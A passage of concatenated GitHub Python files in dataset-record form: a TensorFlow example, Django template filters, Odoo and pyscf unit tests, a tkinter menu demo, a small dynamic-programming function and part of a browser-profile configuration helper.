video_reader.release()\n","repo_name":"yathartha3/Modified-YOLO-for-relative-pose-estimation","sub_path":"evaluate_model_pose_outputs.py","file_name":"evaluate_model_pose_outputs.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41127811200","text":"import tensorflow as tf\n\ntf.compat.v1.disable_eager_execution()\n\nx1 = tf.constant(5)\nx2 = tf.constant(6)\n\nresult = tf.multiply(x1,x2)\n\nprint(result)\n\nsess = tf.compat.v1.Session()\nprint(sess.run(result))\nsess.close()","repo_name":"MM150551/Machine_learning_Testing","sub_path":"TensorFlowtut1.py","file_name":"TensorFlowtut1.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2120941569","text":"\"\"\"The filters used in eusay templates\"\"\"\nimport re\nimport markdown\nimport bleach\nimport datetime\nimport random\n\nfrom django.template.loader import 
render_to_string\nfrom django.template.defaultfilters import stringfilter, pluralize\nfrom django.utils.safestring import mark_safe\nfrom django import template\nfrom django.conf import settings\n\nfrom votes.models import Vote\nfrom core.utils import smart_truncate as core_smart_truncate\n\nregister = template.Library()\n\n\n@register.filter\ndef comment_user_vote(comment, user):\n \"\"\"Get the vote, or lack thereof, of ``user`` on ``comment``\n\n :returns: The vote of ``user`` on ``comment`` as ``0`` for no vote, ``-1``\n for down vote and ``1`` for up vote\n :rtype: integer\n\n \"\"\"\n try:\n vote = comment.votes.get(user=user)\n except Vote.DoesNotExist:\n vote = None\n if not vote:\n user_vote = 0\n elif vote.isVoteUp:\n user_vote = 1\n else:\n user_vote = -1\n return render_to_string('comment_votes.html', {'comment': comment,\n 'user_vote': user_vote})\n\n\n@register.filter\ndef comment_replies(comment):\n \"\"\"Get the replies to ``comment``\n\n :returns: Replies to ``comment`` sorted chronologically\n :rtype: QuerySet\n\n \"\"\"\n return comment.get_replies(sort=\"chronological\")\n\n\n@register.filter(is_safe=True)\n@stringfilter\ndef my_markdown(text):\n \"\"\"Custom markdown filter\n\n :param text: Text to render as markdown\n :returns: ``text`` rendered to markdown\n :rtype: string\n\n \"\"\"\n extensions = [\"nl2br\", ]\n html = markdown.markdown(text, extensions=extensions)\n linkified = bleach.linkify(html)\n allowed_tags = bleach.ALLOWED_TAGS\n allowed_tags.append(\"ins\")\n allowed_tags.append(\"del\")\n cleaned_text = bleach.clean(linkified, strip_comments=False,\n tags=allowed_tags)\n return mark_safe(cleaned_text)\n\n\n@register.filter(name=\"timesince_human\")\ndef humanize_timesince(date):\n \"\"\"Converts ``date`` to a human readable string describing the time since\n\n :param date: Date to convert\n :returns: Time since string\n :rtype: string\n\n \"\"\"\n delta = datetime.datetime.now() - date\n\n num_years = delta.days // 365\n if num_years > 0:\n return u\"%d year%s ago\" % (num_years, pluralize(num_years))\n\n num_weeks = delta.days // 7\n if num_weeks > 0:\n return u\"%d week%s ago\" % (num_weeks, pluralize(num_weeks))\n\n if delta.days > 0:\n return u\"%d day%s ago\" % (delta.days, pluralize(delta.days))\n\n num_hours = delta.seconds // 3600\n if num_hours > 0:\n return u\"%d hour%s ago\" % (num_hours, pluralize(num_hours))\n\n num_minutes = delta.seconds // 60\n if num_minutes > 0:\n return u\"%d minute%s ago\" % (num_minutes, pluralize(num_minutes))\n\n return u\"a few seconds ago\"\n\n\n@register.filter\ndef smart_time(date):\n \"\"\"Creates string describing ``date`` depending on relation to current\n time - hour and minute if ``date`` is today, day and month if ``date`` is\n this year and day, month and year if ``date`` was before this year.\n\n :rtype: string\n\n \"\"\"\n delta = datetime.datetime.now() - date\n\n num_years = delta.days // 365\n if num_years > 0:\n return date.strftime(\"%d %b, %Y\")\n\n elif date.date() != datetime.date.today():\n return date.strftime(\"%d %b\")\n\n else:\n return date.strftime(\"%H:%M\")\n\n\n@register.filter\ndef smart_truncate(text):\n \"\"\"\n Simply a filter for the smart_truncate function in core.utils\n :param text: the text to be truncated\n :rtype: string\n \"\"\"\n return 
core_smart_truncate(text)\n","repo_name":"HughMcGrade/eusay","sub_path":"core/templatetags/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"574083966","text":"from openerp.tests.common import TransactionCase\n\n\nmocked_print_called = 0\n\n\nclass SettingsPoolMockBrowse(object):\n\n def __init__(self):\n self.locations_to_print = []\n\n\nclass TestUpdateFlags(TransactionCase):\n \"\"\"\n Test that the report_printed flag is updated by observations being\n taken and reports being printed\n \"\"\"\n\n def setUp(self):\n super(TestUpdateFlags, self).setUp()\n self.test_utils = self.env['nh.clinical.test_utils']\n self.spell_model = self.env['nh.clinical.spell']\n self.location_model = self.env['nh.clinical.location']\n self.ews_model = self.env['nh.clinical.patient.observation.ews']\n self.test_utils.admit_and_place_patient()\n self.patient_id = self.test_utils.patient.id\n\n def test_flag_changed_by_observation_complete(self):\n \"\"\"\n Test that the report_printed flag is set to False on completing\n an EWS observation\n \"\"\"\n spell = self.spell_model.browse(\n self.spell_model.get_by_patient_id(\n self.patient_id\n )\n )\n spell.write({'report_printed': True})\n self.assertEqual(spell.report_printed, True,\n 'Flag not set correctly by write method')\n self.test_utils.create_and_complete_ews_obs_activity(\n self.patient_id, spell.id)\n self.assertEqual(spell.report_printed, False,\n 'Flag not updated by complete method properly')\n\n # def test_04_test_flag_changed_by_report_printing_method(self):\n # # complete an observation and check flag is now False\n # cr, uid = self.cr, self.uid\n # spell_id = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id)\n # ews_activity_id = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id},\n # {'patient_id': self.patient_id})\n # self.ews_pool.submit(cr, uid, ews_activity_id, self.ews_data)\n # self.ews_pool.complete(cr, uid, ews_activity_id)\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete method properly')\n #\n # # run the report printing method in api and check that the\n # # flag is set to True\n # self.api_pool.print_report(cr, uid, spell_id)\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n #\n # def test_05_test_flag_changed_by_printing_method_no_spell_defined(self):\n # # complete an observation and check flag is now False\n # cr, uid = self.cr, self.uid\n # # clean up before test\n # dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [['report_printed', '=', False]])\n # self.spell_pool.write(\n # cr, uid, dirty_spell_ids, {'report_printed': True})\n #\n # # add demo data\n # spell_id = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id)\n # spell_id2 = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id2)\n # ews_activity_id = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id},\n # {'patient_id': self.patient_id}\n # )\n # ews_activity_id2 = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id2},\n # {'patient_id': self.patient_id2}\n # )\n # self.ews_pool.submit(cr, uid, ews_activity_id, 
self.ews_data)\n # self.ews_pool.complete(cr, uid, ews_activity_id)\n # self.ews_pool.submit(cr, uid, ews_activity_id2, self.ews_data2)\n # self.ews_pool.complete(cr, uid, ews_activity_id2)\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete method properly')\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id2, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete '\n # 'method properly on second report')\n #\n # # run the report printing method in api and check\n # # that the flag is set to True\n # self.api_pool.print_report(cr, uid)\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id2, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n #\n # def test_06_test_flag_not_change_by_wkhtmltopdf_error(self):\n # # complete an observation and check flag is now False\n # cr, uid = self.cr, self.uid\n #\n # def mock_print(*args, **kwargs):\n # global mocked_print_called\n # mocked_print_called += 1\n # if mocked_print_called == 2:\n # raise osv.except_osv(\n # 'Report (PDF)',\n # 'Wkhtmltopdf failed (error code: -11). Message:'\n # )\n # return mock_print.origin(*args, **kwargs)\n #\n # self.registry('report')._patch_method('_run_wkhtmltopdf', mock_print)\n # # clean up before test\n # dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [['report_printed', '=', False]])\n # self.spell_pool.write(\n # cr, uid, dirty_spell_ids, {'report_printed': True})\n #\n # # add demo data\n # spell_id = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id)\n # spell_id2 = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id2)\n # spell_id3 = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id3)\n # ews_activity_id = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id},\n # {'patient_id': self.patient_id}\n # )\n # ews_activity_id2 = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id2},\n # {'patient_id': self.patient_id2}\n # )\n # ews_activity_id3 = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id3},\n # {'patient_id': self.patient_id3}\n # )\n # self.ews_pool.submit(cr, uid, ews_activity_id, self.ews_data)\n # self.ews_pool.complete(cr, uid, ews_activity_id)\n # self.ews_pool.submit(cr, uid, ews_activity_id2, self.ews_data2)\n # self.ews_pool.complete(cr, uid, ews_activity_id2)\n # self.ews_pool.submit(cr, uid, ews_activity_id3, self.ews_data2)\n # self.ews_pool.complete(cr, uid, ews_activity_id3)\n #\n # # Test that all false\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete method properly')\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id2, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete method '\n # 'properly on second report')\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id3, ['report_printed'])['report_printed']\n # 
self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete '\n # 'method properly on second report')\n #\n # # run the report printing method in api and check that the flag\n # # is set to True\n # self.api_pool.print_report(cr, uid)\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id2, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, False,\n # 'Flag not updated by printing method properly')\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id3, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n #\n # # Test that only failed spell is returned for printing\n # new_dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [['report_printed', '=', False]])\n # self.assertEqual(\n # new_dirty_spell_ids, [spell_id2],\n # 'Spells returned post failed print not correct')\n #\n # self.registry('report')._revert_method('_run_wkhtmltopdf')\n #\n # def test_07_test_no_spell_domain_is_empty_when_no_non_\n # printed_spells(self):\n # cr, uid = self.cr, self.uid\n # loc_ids = self.location_pool.search(\n # cr, uid, [\n # ['usage', '=', 'ward'],\n # ['backup_observations', '=', True]\n # ]\n # )\n # dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [\n # ['report_printed', '=', False],\n # ['state', 'not in', ['completed', 'cancelled']],\n # ['location_id', 'child_of', loc_ids]\n # ]\n # )\n # self.spell_pool.write(\n # cr, uid, dirty_spell_ids, {'report_printed': True})\n #\n # test_empty = self.spell_pool.search(\n # cr, uid, [\n # ['report_printed', '=', False],\n # ['state', 'not in', ['completed', 'cancelled']],\n # ['location_id', 'child_of', loc_ids]\n # ]\n # )\n # self.assertEqual(\n # test_empty, [],\n # 'No Spell Domain returned spells when should be empty')\n #\n # def test_08_test_no_spell_domain_is_empty_when_no_non_\n # printed_spells(self):\n # cr, uid = self.cr, self.uid\n # loc_ids = self.location_pool.search(\n # cr, uid, [\n # ['usage', '=', 'ward'],\n # ['backup_observations', '=', True]\n # ]\n # )\n # dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [\n # ['report_printed', '=', False],\n # ['state', 'not in', ['completed', 'cancelled']],\n # ['location_id', 'child_of', loc_ids]\n # ]\n # )\n # test_spell = dirty_spell_ids[0]\n # self.spell_pool.write(\n # cr, uid, dirty_spell_ids[1:], {'report_printed': True})\n #\n # test_empty = self.spell_pool.search(\n # cr, uid, [\n # ['report_printed', '=', False],\n # ['state', 'not in', ['completed', 'cancelled']],\n # ['location_id', 'child_of', loc_ids]\n # ]\n # )\n # self.assertEqual(\n # test_empty, [test_spell],\n # 'No Spell Domain returned more than one spell')\n #\n # def test_09_test_report_added_to_database(self):\n # # run the report printing method in api and check that report\n # # added to DB\n # cr, uid = self.cr, self.uid\n # attachment_id = self.api_pool.add_report_to_database(\n # cr, uid,\n # 'nh.clinical.observation_report',\n # 'test_data',\n # 'test_report.pdf',\n # 'nh.clinical.observation_report_wizard',\n # 1\n # )\n #\n # attachment_data = self.ir_pool.read(\n # cr, uid, attachment_id, ['datas'])[0]['datas']\n # report_str = base64.decodestring(attachment_data)\n #\n # self.assertEqual(\n # report_str, 'test_data', 'Report not added to 
database properly')\n #\n # def test_10_test_report_added_to_file_system(self):\n # # run the report printing method in api and check that file\n # # was created on FS\n # # /bcp/out\n # self.api_pool.add_report_to_backup_location('/bcp/out',\n # 'test_data',\n # 'test_report')\n # with open('/bcp/out/test_report.pdf', 'r') as report_file:\n # file_content = report_file.read()\n # self.assertEqual(\n # file_content,\n # 'test_data',\n # 'Report not added to filesystem properly'\n # )\n #\n # def test_11_test_report_filename_is_correct(self):\n # # run the report pringing method in teh api and\n # # check that the file is correctly named\n # # ward_surname_nhs_number\n # cr, uid = self.cr, self.uid\n # spell_id = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id)\n # nhs_number = '1231231231'\n # ward = None\n # surname = 'Wren'\n # file_name = '{w}_{s}_{n}'.format(w=ward, s=surname, n=nhs_number)\n #\n # # do print_report\n # self.api_pool.print_report(cr, uid, spell_id)\n # # check backup file name\n # backup_exists = os.path.isfile('/bcp/out/{0}.pdf'.format(file_name))\n # self.assertEqual(\n # backup_exists, True, 'Report incorrectly named on file system')\n #\n # def test_12_test_general_settings_view_updated_with_options(self):\n # # Grab the view XML and make sure it has the overridden values\n # cr, uid = self.cr, self.uid\n # view_pool = self.registry('ir.ui.view')\n # parent_view_id = view_pool.search(\n # cr, uid, [\n # ['model', '=', 'base.config.settings'],\n # ['mode', '=', 'primary']\n # ]\n # )[0]\n # child_view_ids = view_pool.read(\n # cr, uid,\n # parent_view_id,\n # ['inherit_children_ids']\n # )['inherit_children_ids']\n # our_view_id = view_pool.search(\n # cr, uid, [['name', '=', 'base.config.settings.nhclinical']])[0]\n # self.assertTrue(\n # our_view_id in child_view_ids,\n # 'View not in list of inherited views for general\n # settings screen')\n #\n # def test_13_test_gen_settings_loads_backup_enabld_wards_correctly(self):\n # # Using the demo ward call the function to load the data\n # cr, uid = self.cr, self.uid\n # settings_pool = self.registry('base.config.settings')\n # get_vals = settings_pool.get_default_all(cr, uid, [])\n # self.assertEqual(\n # get_vals['locations_to_print'][0],\n # self.wu_id,\n # 'Ward U id not in location to print from settings')\n #\n # def test_14_gen_settings_set_location_removes_all_\n # wards_not_defined(self):\n # cr, uid = self.cr, self.uid\n # settings_pool = self.registry('base.config.settings')\n # record = settings_pool.create(cr, uid, {'locations_to_print': []})\n # settings_pool.set_locations(cr, uid, [record])\n # get_vals = settings_pool.get_default_all(cr, uid, [])\n # self.assertEqual(\n # get_vals['locations_to_print'],\n # [], 'Ward U not removed from backed up wards')\n","repo_name":"Jdog1956/Open-eObs","sub_path":"nh_eobs_backup/tests/test_update_flag.py","file_name":"test_update_flag.py","file_ext":"py","file_size_in_byte":15957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30967420270","text":"def cry(m,t):\n\td = len(m)\n\tn = len(t)\n\n\t# Initialize memo table\n\tmemo = [[0 for j in range(n+1)] for i in range(d+1)]\n\n\t# Base case\n\tfor book in range(n+1):\n\t\tmemo[d][book] = sum(t[book:])\n\tfor day in range(d+1):\n\t\tmemo[day][n] = sum([F**4 for F in m[day:]])\n\n\tfor i in range(d-1,-1,-1):\n\t\tfor j in range(n-1,-1,-1):\n\t\t\ttears = []\n\t\t\tfor k in range(1,n-j+1):\n\t\t\t\tFi = max(m[i] - sum(t[j:j+k]), 0)\n\t\t\t\tSi 
= max(sum(t[j:j+k])- m[i], 0)\n\t\t\t\ttear = Fi**4 + Si\n\t\t\t\ttears.append(tear + memo[i+1][j+k])\n\t\t\tmemo[i][j] = min(tears)\n\t\n\treturn memo[0][0]\n","repo_name":"matthhong/sketches","sub_path":"cry.py","file_name":"cry.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45962459524","text":"#!/usr/bin/env python\nfrom pyscf import scf, mp, cc\nimport dchf\n\nimport numpy\n\nimport unittest\nfrom numpy import testing\nfrom test_common import helium_chain, hydrogen_dimer_chain\n\n\ndef assign_chain_domains(dchf, domain_size, buffer_size, reset_dm=True):\n \"\"\"\n Assigns domains given the size of the domain core region and buffer region.\n Args:\n dchf (dchf.DCHF): divide-conquer Hartree-Fock setup;\n domain_size (int): size of domains' cores;\n buffer_size (int): size of the domains' buffer regions\n reset_dm (bool): resets the density matrix;\n \"\"\"\n if reset_dm:\n dchf.dm = None\n dchf.domains_erase()\n for i in range(0, dchf.__mol__.natm, domain_size):\n dchf.add_domain(numpy.arange(\n max(i - buffer_size, 0),\n min(i + domain_size + buffer_size, dchf.__mol__.natm),\n ), core=numpy.arange(i, min(i + domain_size, dchf.__mol__.natm)))\n\n\nclass HydrogenChainTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n # Solve HF\n cls.h6chain = hydrogen_dimer_chain(6)\n cls.h6mf = scf.RHF(cls.h6chain)\n cls.h6mf.kernel()\n cls.total_energy = cls.h6mf.e_tot - cls.h6mf.energy_nuc()\n cls.dm = cls.h6mf.make_rdm1()\n\n # Solve MP2\n cls.h6mp2 = mp.MP2(cls.h6mf)\n cls.h6mp2.kernel()\n\n # Solve CCSD\n cls.h6ccsd = cc.CCSD(cls.h6mf)\n cls.h6ccsd.kernel()\n\n # Single-domain DCHF\n cls.h6dchf_1 = dchf.DCHF(cls.h6chain)\n assign_chain_domains(cls.h6dchf_1, 6, 0)\n cls.h6dchf_1.kernel(tolerance=1e-10)\n cls.h6dcmp2_1 = dchf.DCMP2(cls.h6dchf_1)\n cls.h6dcmp2_1.kernel()\n cls.h6dcccsd_1 = dchf.DCCCSD(cls.h6dchf_1)\n cls.h6dcccsd_1.kernel()\n\n # Three-domain DCHF\n cls.h6dchf_3 = dchf.DCHF(cls.h6chain)\n assign_chain_domains(cls.h6dchf_3, 2, 2)\n cls.h6dchf_3.kernel(fock_hook=None)\n cls.h6dcmp2_3 = dchf.DCMP2(cls.h6dchf_3)\n cls.h6dcmp2_3.kernel()\n cls.h6dcccsd_3 = dchf.DCCCSD(cls.h6dchf_3)\n cls.h6dcccsd_3.kernel()\n\n def test_fock(self):\n \"\"\"\n Tests the Fock matrix.\n \"\"\"\n a1 = [1, 2]\n a2 = [1, 3, 4]\n testing.assert_allclose(\n self.h6mf.get_fock(dm=self.dm)[self.h6dchf_1.get_block(a1, a2)],\n self.h6dchf_1.get_fock(self.dm, a1, a2),\n atol=1e-14,\n )\n\n def test_orb_energies(self):\n \"\"\"\n Tests exact orbital energies.\n \"\"\"\n e, _ = self.h6dchf_1.get_orbs(self.dm, None)\n testing.assert_allclose(e, self.h6mf.mo_energy, rtol=1e-4)\n\n def test_util(self):\n \"\"\"\n Test utility functions.\n \"\"\"\n t = dchf.DCHF(self.h6chain)\n t.add_domain([0, 1], core=[0, 1])\n with self.assertRaises(ValueError):\n t.domains_cover(r=True)\n\n def test_hf_single_domain(self):\n \"\"\"\n A single-domain HF test.\n \"\"\"\n testing.assert_allclose(self.h6dchf_1.dm, self.dm, atol=1e-6)\n testing.assert_allclose(self.h6dchf_1.hf_energy, self.total_energy, rtol=1e-8)\n\n def test_mp2_single_domain(self):\n \"\"\"\n A single-domain MP2 test.\n \"\"\"\n testing.assert_allclose(self.h6dcmp2_1.e2, self.h6mp2.e_corr, atol=1e-8)\n\n def test_ccsd_single_domain(self):\n \"\"\"\n A single-domain CCSD test.\n \"\"\"\n testing.assert_allclose(self.h6dcccsd_1.e2, self.h6ccsd.e_corr, atol=1e-8)\n\n def test_hf(self):\n \"\"\"\n HF test.\n \"\"\"\n 
testing.assert_allclose(self.h6dchf_3.dm, self.dm, atol=1e-2)\n testing.assert_allclose(self.h6dchf_3.hf_energy, self.total_energy, rtol=1e-4)\n\n def test_mp2(self):\n \"\"\"\n MP2 test.\n \"\"\"\n testing.assert_allclose(self.h6dcmp2_3.e2, self.h6mp2.e_corr, atol=1e-4)\n\n def test_ccsd(self):\n \"\"\"\n CCSD test.\n \"\"\"\n testing.assert_allclose(self.h6dcccsd_3.e2, self.h6ccsd.e_corr, atol=1e-3)\n\n\nclass HydrogenChain12Test(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.h12chain = hydrogen_dimer_chain(16)\n cls.h12mf = scf.RHF(cls.h12chain)\n cls.h12mf.kernel()\n\n cls.total_energy = cls.h12mf.e_tot - cls.h12mf.energy_nuc()\n cls.dm = cls.h12mf.make_rdm1()\n\n cls.h12dchf = dchf.DCHF(cls.h12chain)\n\n def test_iter(self):\n \"\"\"\n Tests DCHF iterations.\n \"\"\"\n assign_chain_domains(self.h12dchf, 4, 2)\n e = self.h12dchf.kernel(tolerance=1e-9, fock_hook=None)\n testing.assert_allclose(self.h12dchf.dm, self.dm, atol=1e-2)\n testing.assert_allclose(self.h12mf.e_tot - self.h12chain.energy_nuc(), e, rtol=1e-4)\n\n mp2 = dchf.DCMP2(self.h12dchf)\n mp2.kernel()\n e_ref, _ = mp.MP2(self.h12mf).kernel()\n testing.assert_allclose(e_ref, mp2.e2, atol=1e-4)\n\n\nclass HeliumChainTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.he10chain = helium_chain(10)\n\n cls.he10mf = scf.RHF(cls.he10chain)\n cls.he10mf.kernel()\n cls.he10mp2 = mp.MP2(cls.he10mf)\n cls.he10mp2.kernel()\n\n cls.he10dchf = dchf.DCHF(cls.he10chain)\n assign_chain_domains(cls.he10dchf, 1, 1)\n cls.he10dchf.kernel()\n cls.he10dcmp2 = dchf.DCMP2(cls.he10dchf)\n cls.he10dcmp2.kernel()\n\n def test_results(self):\n testing.assert_allclose(self.he10mf.e_tot, self.he10dchf.e_tot)\n testing.assert_allclose(self.he10mp2.e_corr, self.he10dcmp2.e2)\n","repo_name":"pulkin/local-pyscf","sub_path":"test_dchf.py","file_name":"test_dchf.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13333542137","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File : Tk05.py\n# Author: roohom\n# Date : 2018/10/28 0028\n\n# 级联菜单\n\nimport tkinter\n\nbaseFrame = tkinter.Tk()\nbaseFrame.title(\"demo\")\nbaseFrame.geometry(\"300x450+500+150\") # 设置窗口大小及位置,300x450,位置是x:500, y:150\n\nmenuBar = tkinter.Menu(baseFrame)\ntmenuBar = tkinter.Menu(baseFrame)\nfor item in [\"文件\", \"编辑\", \"查看\", \"工具\", \"关于\"]:\n tmenuBar.add_command(label=item)\n\nmenuBar.add_cascade(label=\"刷新\")\nmenuBar.add_cascade(label=\"跳转\", menu=tmenuBar)\n\nbaseFrame[\"menu\"] = menuBar\n\n\nbaseFrame.mainloop()\n","repo_name":"roohom/demo","sub_path":"Tkinter/Tk05.py","file_name":"Tk05.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43616166118","text":"import ruamel.yaml\n\nimport json\nimport os\nfrom pathlib import Path\n\n# 系統存檔主目錄\nSYSTEM_FOLDER_PATH = os.path.join(os.getenv('APPDATA'), 'Socializing')\n# 系統存檔位置\nSYSTEM_CONFIG_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'config.json')\n# 瀏覽器裝置Profile位置\nPROFILE_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserCache')\n# 瀏覽器裝置的設定檔存檔位置\nPROFILE_CONFIG_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserProfile')\n# 瀏覽器裝置的備份檔存檔位置\nPROFILE_BACKUP_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserBackup')\n# 瀏覽器主程式位置\nBROWSER_BIN_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserBin')\n# 瀏覽器主程式位置\nBROWSER_BIN_WIN_PATH = os.path.join(BROWSER_BIN_PATH, 'chrome-win')\n# 
日誌位置\nLOG_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'Logs')\n\n# Script位置\nSCRIPT_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserScript')\n# 腳本列表\nSCRIPT_URL_LIST = [\n \"https://socializing.sakurafb.cc/scripts/facebook.py\",\n \"https://socializing.sakurafb.cc/scripts/facebook_get_profile.py\"\n]\n\n\ndef dict_get(d, keys, default=None):\n \"\"\"\n Get values in dictionary safely.\n https://stackoverflow.com/questions/25833613/safe-method-to-get-value-of-nested-dictionary\n\n Args:\n d (dict):\n keys (str, list): Such as `Scheduler.NextRun.value`\n default: Default return if key not found.\n\n Returns:\n\n \"\"\"\n if isinstance(keys, str):\n keys = keys.split('.')\n assert type(keys) is list\n if d is None:\n return default\n if not keys:\n return d\n return dict_get(d.get(keys[0]), keys[1:], default)\n\n\ndef dict_set(d, keys, value):\n \"\"\"\n Set value into dictionary safely, imitating deep_get().\n \"\"\"\n if isinstance(keys, str):\n keys = keys.split('.')\n assert type(keys) is list\n if not keys:\n return value\n if not isinstance(d, dict):\n d = {}\n d[keys[0]] = dict_set(d.get(keys[0], {}), keys[1:], value)\n return d\n\n\ndef dict_merge(old, new):\n for key, value in new.items():\n if isinstance(value, dict):\n if key in old:\n dict_merge(old[key], value)\n else:\n old[key] = value\n else:\n if key not in old:\n old[key] = value\n\n return old\n\n\ndef dict_pop(d, keys, default=None):\n \"\"\"\n Pop value from dictionary safely, imitating deep_get().\n \"\"\"\n if isinstance(keys, str):\n keys = keys.split('.')\n assert type(keys) is list\n if not isinstance(d, dict):\n return default\n if not keys:\n return default\n elif len(keys) == 1:\n return d.pop(keys[0], default)\n return dict_pop(d.get(keys[0]), keys[1:], default)\n\n\ndef dict_default(d, keys, value):\n \"\"\"\n Set default value into dictionary safely, imitating deep_get().\n Value is set only when the dict doesn't contain such keys.\n \"\"\"\n if isinstance(keys, str):\n keys = keys.split('.')\n assert type(keys) is list\n if not keys:\n if d:\n return d\n else:\n return value\n if not isinstance(d, dict):\n d = {}\n d[keys[0]] = dict_default(d.get(keys[0], {}), keys[1:], value)\n return d\n\n\ndef dict_iter(data, depth=0, current_depth=1):\n \"\"\"\n Iter a dictionary safely.\n\n Args:\n data (dict):\n depth (int): Maximum depth to iter\n current_depth (int):\n\n Returns:\n list: Key path\n Any:\n \"\"\"\n if isinstance(data, dict) \\\n and (depth and current_depth <= depth):\n for key, value in data.items():\n for child_path, child_value in dict_iter(value, depth=depth, current_depth=current_depth + 1):\n yield [key] + child_path, child_value\n else:\n yield [], data\n\n\n# Profile\n\ndef get_profile_config_template():\n return {\n \"index\": 1,\n \"profile\": {\n \"name\": \"default\",\n },\n \"facebook\": {\n \"name\": \"default\",\n \"user_id\": \"\"\n },\n \"tiktok\": {\n \"name\": \"default\",\n \"user_id\": \"\"\n }\n }\n\n\ndef save_profile_config(data):\n \"\"\"存模擬器設定檔(Profile) 至 ./config/profile/\"\"\"\n index = dict_get(data, \"index\")\n os.makedirs(PROFILE_CONFIG_FOLDER_PATH, exist_ok=True)\n config_path = os.path.join(PROFILE_CONFIG_FOLDER_PATH, f'{index}.json')\n\n with open(config_path, \"w\") as f:\n json.dump(data, f, indent=2)\n\n\ndef load_profile_config(index):\n \"\"\"存模擬器設定檔(Profile) 至 ./config/profile/\"\"\"\n\n config_path = os.path.join(PROFILE_CONFIG_FOLDER_PATH, f'{index}.json')\n if os.path.isfile(config_path):\n with open(config_path, \"r\") as f:\n my_data = 
